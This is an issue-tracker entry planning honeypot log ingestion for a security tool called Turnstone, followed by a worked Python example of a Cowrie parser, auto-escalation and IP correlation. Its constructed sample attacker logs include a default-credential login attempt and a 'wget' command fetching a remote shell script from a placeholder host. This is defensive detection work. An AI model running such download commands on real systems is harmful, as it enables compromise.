feat: honeypot log ingestion — Cowrie, OpenCanary, T-Pot parsers + guaranteed-malicious alerting #67

Open · opened 2026-06-17 11:37:15 -07:00 by pyr0ball (Owner) · 0 comments

Context: Turnstone has FTS5 search, anomaly scoring, and cybersec zero-shot scoring. This issue tracks the ingestion pipeline work to bring honeypot log sources into Turnstone with guaranteed-malicious auto-escalation and cross-source IP correlation. Supersedes/extends #58 (which covers deploying the honeypot; this covers Turnstone parsing and alerting).

Plan: circuitforge-plans/turnstone/superpowers/plans/2026-06-17-honeypot-ai-threat-integration.md — Track A

Scope:

  • sources.yaml schema: honeypot: true flag + validation
  • app/ingest/parsers/cowrie.py — NDJSON parser, eventid-to-tag mapping
  • app/ingest/parsers/opencanary.py — JSON parser, logtype integer-to-tag mapping
  • app/ingest/parsers/tpot.py — Elastic-format parser with sub-service delegation
  • patterns/honeypot.yaml — 4 new tags: honeypot_hit, honeypot_credential_attempt, honeypot_exploit_attempt, honeypot_scan (CRITICAL/HIGH)
  • Auto-escalation fast-path in app/ingest/pipeline.py — bypasses anomaly scoring, creates CRITICAL incident with auto_escalated=true
  • Background IP correlation query across non-honeypot sources; correlated_sources attached to incident
  • Incident detail UI: "This IP also appeared in: [sources]" section
  • Auto-nominate honeypot IPs to blocklist_candidates with status: approved
  • firewall_block_candidates table schema (for future router API adapter use)
  • Unit tests for all 3 parsers; integration test: honeypot ingest → CRITICAL incident

Out of scope: Deploying honeypot infrastructure (#58), router firewall API adapters (backlog), ML fine-tuning on honeypot data.

Acceptance criteria:

  • Cowrie NDJSON file with cowrie.login.failed ingests as CRITICAL incident with auto_escalated=true
  • Sources without honeypot: true are unaffected by the new fast-path
  • Honeypot hit IP that also appears in nginx logs shows correlated sources on incident detail
  • Source IP appears in blocklist_candidates with status: approved immediately after ingestion
  • All existing tests pass

Related: Plan doc — circuitforge-plans/turnstone/superpowers/plans/2026-06-17-honeypot-ai-threat-integration.md | Infrastructure — #58

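The Cowrie parser, `honeypot: true` validation, auto-escalation fast path, cross-source IP correlation and blocklist nomination described in the scope above, as an added worked example. This is my code, not Turnstone's: the eventid-to-tag assignment, the in-memory `Pipeline` store, the nginx stand-in for the normal scoring path and the sample log lines are all assumptions; the four tag names and the `auto_escalated` / `status: approved` fields come from the issue.

```python
import json
import re
from dataclasses import dataclass, field

# Assumed Cowrie eventid -> tag mapping; the tag names are the four from patterns/honeypot.yaml
# in the issue, which eventid lands on which tag is my assumption.
COWRIE_EVENT_TAGS = {
    "cowrie.session.connect": "honeypot_hit",
    "cowrie.login.failed": "honeypot_credential_attempt",
    "cowrie.command.input": "honeypot_exploit_attempt",
}
NGINX_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[^"]*" (\d{3}) ')  # client IP, status

@dataclass
class Event:
    source: str
    src_ip: str
    tag: str      # honeypot tag, "" for non-honeypot sources
    raw: dict
@dataclass
class Incident:
    src_ip: str
    source: str
    severity: str
    auto_escalated: bool
    correlated_sources: list = field(default_factory=list)

def validate_sources(sources: dict) -> dict:
    # honeypot must be a real bool: the string "yes" must not make a production source
    # auto-escalate, and the string "true" must not silently disable the `is True` fast path.
    for name, cfg in sources.items():
        if "honeypot" in cfg and not isinstance(cfg["honeypot"], bool):
            raise ValueError(f"{name}: honeypot must be true/false, got {cfg['honeypot']!r}")
    return sources

def parse_cowrie(ndjson: str, source: str) -> list:
    """One Cowrie JSON record per line; bad lines and records without src_ip are dropped."""
    events = []
    for line in ndjson.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        src_ip = rec.get("src_ip") if isinstance(rec, dict) else None
        if isinstance(src_ip, str) and src_ip:
            # Unknown eventids still count as a hit: any traffic to the honeypot is attacker traffic.
            tag = COWRIE_EVENT_TAGS.get(rec.get("eventid"), "honeypot_hit")
            events.append(Event(source, src_ip, tag, rec))
    return events

def parse_nginx(text: str, source: str) -> list:
    return [Event(source, m.group(1), "", {"status": int(m.group(2))})
            for m in map(NGINX_RE.match, text.splitlines()) if m]

class Pipeline:
    def __init__(self, sources: dict):
        self.sources = validate_sources(sources)
        self.ip_index = {}              # src_ip -> set of NON-honeypot sources it appeared in
        self.incidents = []
        self.blocklist_candidates = []

    def ingest(self, source: str, raw: str) -> None:
        cfg = self.sources[source]
        parser = parse_cowrie if cfg["parser"] == "cowrie" else parse_nginx
        for ev in parser(raw, source):
            if cfg.get("honeypot") is True:
                self.incidents.append(self._escalate(ev))   # fast path: anomaly scoring bypassed
            else:
                self.ip_index.setdefault(ev.src_ip, set()).add(source)
                if ev.raw.get("status", 200) >= 400:        # stand-in for the normal scoring path
                    self.incidents.append(Incident(ev.src_ip, source, "MEDIUM", False))

    def _escalate(self, ev: Event) -> Incident:
        # Correlation is inline here; the issue plans it as a background query.
        inc = Incident(ev.src_ip, ev.source, "CRITICAL", True,
                       sorted(self.ip_index.get(ev.src_ip, ())))
        if all(c["ip"] != ev.src_ip for c in self.blocklist_candidates):
            self.blocklist_candidates.append({"ip": ev.src_ip, "status": "approved", "reason": ev.tag})
        return inc

# Constructed sample input (not real captures): 203.0.113.5 probes nginx, then hits the honeypot.
NGINX_SAMPLE = (
    '203.0.113.5 - - [17/Jun/2026:11:36:50 -0700] "GET /wp-login.php HTTP/1.1" 404 153 "-" "curl/8.0"\n'
    '198.51.100.22 - - [17/Jun/2026:11:36:52 -0700] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"\n'
)
COWRIE_SAMPLE = "\n".join([
    '{"eventid":"cowrie.session.connect","src_ip":"203.0.113.5","src_port":51234,"dst_port":2222,"session":"a1b2c3d4"}',
    '{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.5","session":"a1b2c3d4"}',
    '{"eventid":"cowrie.command.input","input":"wget http://198.51.100.7/x.sh","src_ip":"203.0.113.5","session":"a1b2c3d4"}',
    "this line is not JSON",                                              # skipped by the parser
    '{"eventid":"cowrie.login.failed","username":"admin","session":"zz"}',  # no src_ip: skipped
])
SOURCES = {
    "nginx": {"parser": "nginx", "honeypot": False},
    "cowrie-hp1": {"parser": "cowrie", "honeypot": True},
}
def run_demo() -> Pipeline:
    p = Pipeline(SOURCES)
    p.ingest("nginx", NGINX_SAMPLE)         # normal path; populates ip_index for correlation
    p.ingest("cowrie-hp1", COWRIE_SAMPLE)   # honeypot fast path
    return p
```

Running `run_demo()` gives one MEDIUM incident from nginx and three CRITICAL, `auto_escalated=True` incidents from the honeypot, each carrying `correlated_sources == ["nginx"]`, plus a single approved blocklist candidate for 203.0.113.5. Two caveats worth carrying into the real implementation: the parser drops rather than escalates records without a `src_ip` (an empty or missing IP must never reach the blocklist), and because correlation here only looks at events already indexed, a later nginx hit from the same IP would not update an existing incident.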
pyr0ball added the enhancement label 2026-06-17 11:37:15 -07:00
Reference: Circuit-Forge/turnstone#67